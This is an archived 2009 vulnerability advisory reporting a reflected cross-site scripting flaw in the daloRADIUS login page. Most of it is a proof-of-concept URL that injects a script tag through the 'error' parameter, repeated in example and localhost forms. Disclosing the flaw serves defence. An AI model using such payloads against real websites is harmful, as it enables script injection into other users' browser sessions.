Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22939
HistoryDec 15, 2009 - 12:00 a.m.

Daloradius XSS Vulnerability

2009-12-1500:00:00
vulners.com
41

###########################################

Script Name : daloradius ( All Version )

Bug Type : XSS vulnerability

Found by : Hadi Kiamarsi

Contact : hadikiamarsi [at] hotmail.com

Download : http://sourceforge.net/projects/daloradius/

###########################################

PoC :

http://[target]/[path]/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

example :

http://www.example.com/daloradius-users/login.php?error=&gt;&quot;&gt;&lt;script&gt;alert&#40;&#39;Hadi Kiamarsi')</script>

local Example :

http://localhost/root/daloradius-users/login.php?error=&gt;&quot;&gt;&lt;script&gt;alert&#40;&#39;Hadi Kiamarsi')</script>